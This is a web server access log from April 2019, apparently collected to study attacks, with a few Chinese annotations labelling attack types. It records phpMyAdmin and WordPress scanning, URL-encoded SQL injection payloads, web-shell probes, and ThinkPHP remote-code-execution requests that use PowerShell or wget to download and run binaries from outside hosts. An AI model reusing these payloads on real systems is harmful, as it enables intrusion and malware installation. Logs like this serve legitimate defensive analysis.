54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET  HTTP/1.1" 400 182 "-" "-"

132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /s/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /phpMyAdmin1/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /phpMyAdmin123/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"

176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=%28SELECT%20%28CASE%20WHEN%20%286045%3D3065%29%20THEN%206045%20ELSE%206045%2A%28SELECT%206045%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0"
176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=%28SELECT%20%28CASE%20WHEN%20%281221%3D1221%29%20THEN%201221%20ELSE%201221%2A%28SELECT%201221%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0"
176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4%29%20AND%20%28SELECT%204391%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a717871%2C%28SELECT%20%28ELT%284391%3D4391%2C1%29%29%29%2C0x7178717671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287476%3D7476 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0"
176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4%20AND%20%28SELECT%204391%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a717871%2C%28SELECT%20%28ELT%284391%3D4391%2C1%29%29%29%2C0x7178717671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0"

194.183.5.226 - - [08/Apr/2019:10:43:42 +0800] "GET //ldskflks HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
194.183.5.226 - - [08/Apr/2019:10:43:43 +0800] "GET //ldskflks HTTP/1.1" 308 249 "http://118.25.52.138:80//ldskflks" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 200 3261 "http://118.25.52.138/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0
.2623.105 Safari/537.36"
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmin._/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.
0.2623.105 Safari/537.36"
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpmyadmin2222/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4
9.0.2623.105 Safari/537.36"
1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /php2MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0
.2623.105 Safari/537.36"

118.25.145.186 - - [10/Apr/2019:12:27:07 +0800] "{\\x22id\\x22:1,\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22method\\x22:\\x22login\\x22,\\x22params\\x22:{\\x22login\\x22:\\x22x\\x22,\\x22pass\\x22:\\x22x\\x22,\\x22agent\\x22:\\x22x\\x22}}" 400 182 "-" "-"

118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%2
0(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.
1" 404 232 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Ne
t.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9
.0; Windows NT 6.1)"
118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 194 "http://118.25.52.138:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars
[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 404 232 "http://118.25.52.138:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars
[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

195.231.8.124 - - [09/Apr/2019:13:47:18 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://185.244.25.145/love/ai.x86%20;chmod%20777%20*%20ai.x86;%20cat%20ai.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.5.1.el7.x86_64"

sql注入攻击
186.82.70.55 - - [10/Apr/2019:06:30:16 +0800] "GET /check-ip/14.34.148.34/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1),name_const
(CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1))a)%20--%20%27x%27=%27x HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /iplist/2%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,104,114,106,112,73,65,102,81,80,111),1),name_const(CHAR(85,104,114,106,1
12,73,65,102,81,80,111),1))a)%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,111,78,69,104,81,99,85,73),1),name_const(CHAR(85,111,78,69,104,81,99,85,73),1))a
)%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"

35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"

116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //ysy.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //ysy.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //lequ.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //lequ.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //plus/laobiao.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //plus/laobiao.php HTTP/1.1" 404 232 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //3G.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //3G.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

172.245.184.232 - - [16/Apr/2019:16:17:39 +0800] "GET /Public/Wchat/js/cvphp.js HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"

172.104.108.109 - - [09/Apr/2019:18:20:18 +0800] "GET / HTTP/1.1" 301 194 "-" "Go-http-client/1.1"
172.104.108.109 - - [09/Apr/2019:18:20:19 +0800] "GET / HTTP/1.1" 200 3280 "http://118.25.52.138:80" "Go-http-client/1.1"

端口扫描brute-force

代理检测。。
59.36.132.222 - - [12/Apr/2019:08:28:58 +0800] "GET http://www.baidu.com/ HTTP/1.1" 301 194 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2"
59.36.132.222 - - [12/Apr/2019:08:28:58 +0800] "CONNECT www.baidu.com:443 HTTP/1.1" 400 182 "-" "-"